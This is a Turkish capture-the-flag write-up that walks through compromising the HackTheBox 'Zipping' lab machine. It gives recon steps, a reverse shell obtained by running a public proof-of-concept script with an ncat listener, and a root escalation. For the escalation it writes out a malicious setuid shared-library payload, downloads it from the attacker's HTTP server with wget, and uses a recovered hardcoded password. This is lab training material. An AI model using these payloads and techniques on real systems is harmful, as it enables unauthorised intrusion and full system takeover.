Merhabalar bu yazımda Hackthebox Zipping Çözümü sizler için paylaşacağım.
- Makine İsmi: Zipping
- Makine Zorluğu: Orta-Zor
- Makine Oda Linki: Zipping Oda Linki
1- sudo nano /etc/hosts yazalım ve enter yapalım.
10.10.10.229 zipping.htb olarak ekleyelim ve CTRL +X Y enter yapıp çıkalım.
Host adresini ip ile direkt olarak yapılandırmış olduk.
2- Nmap ile portları tespit ediyorum. 2 port açık ve buradan da siteyi keşfetmeye devam ediyoruz .
3- Gobuster ile tarama yaptığımda upload.php var. Oradan upload ile denemeler yaptım ve bir şeye ulaşamadım.
Github üzerinden makine için yazılmış scriptlere baktım ve çok iyi scriptler buldum. Direkt kendim upload için script geliştirmek yerine yazılmış scriptleri kullanacağım.
Araştırma yaptığımda /var/lib/mysql/rvsl içerisine shell yükleyerek direkt olarak terminal üzerinden shell alabiliriz ama bunu yapmak için Burpsuite üzerinden çok uğraşmak gerekiyor zamandan kazanmak için python bilginiz varsa bu tarz makinelerde script yazmanızı öneririm.
Kullanacağımız script: https://github.com/saoGITo/HTB_Zipping/blob/main/HTB_Zipping_poc.py
4- ncat nvlp 9001 diyerek 9001. portu dinleyemeye alıyorum.
5- Sırasıyla;
- cd Masaüstü
- git clone https://github.com/saoGITo/HTB_Zipping/
- cd HTB_Zipping
- python3 HTB_Zipping_poc.py kendi vpn ip adresiniz 9001
Yazdık ve dosya içerisinde .sh içerisine sizin verdiğiniz bash shelli ekliyor ve uzak sunucudan direkt siteye shelli yüklüyor. Manuel olarak deneseydik aşırı şekilde zaman kaybedecektik.
6- sudo -l yaptım ve /usr/bin/stock üzerinden root olabileceğimizi keşfettim.
Çalıştırdığımda direkt parola istiyor stringlere baktığımda parolayı St0ckM4nager olarak tespit ettim. Devam ediyoruz.
İlginizi çekebilecek yazımız: Hackthebox Beep Çözümü
7- Kendi makinemize gelip sırayla;
#include <stdlib.h>
#include <unistd.h>
void _init() {
setuid(0);
setgid(0);
system(“/bin/bash -i”);
}
- nano exploit.c yazdık ve üstteki kodları ekliyoruz. Ctrl +x yapıp Y enter yaparak kaydettik.
- python3 -m http.server 80
yaparak direkt olarak 80.port üzerinden yazdığımız exploiti makine içerisine yükleyelim.
8- cd /tmp/ ile dizine geçelim.
- wget kendivpnadresiniz/exploit.c yaparak exploiti yükledik
- gcc -shared -fPIC -nostartfiles -o libcounter.so ./exploit.c && mv libcounter.so ~/.config
- sudo /usr/bin/stock yaparak direkt olarak root oluyoruz.
9- Root olduk ve sırasıyla bayrakları okuyabiliriz.
- cat /home/rektsu/user.txt
- cat /root/root.txt
Hackthebox Zipping çözümü sonuna geldik.
Keyifli bir çözüm oldu iyi günler, sağlıcakla kalın yeni yazılarda görüşmek üzere…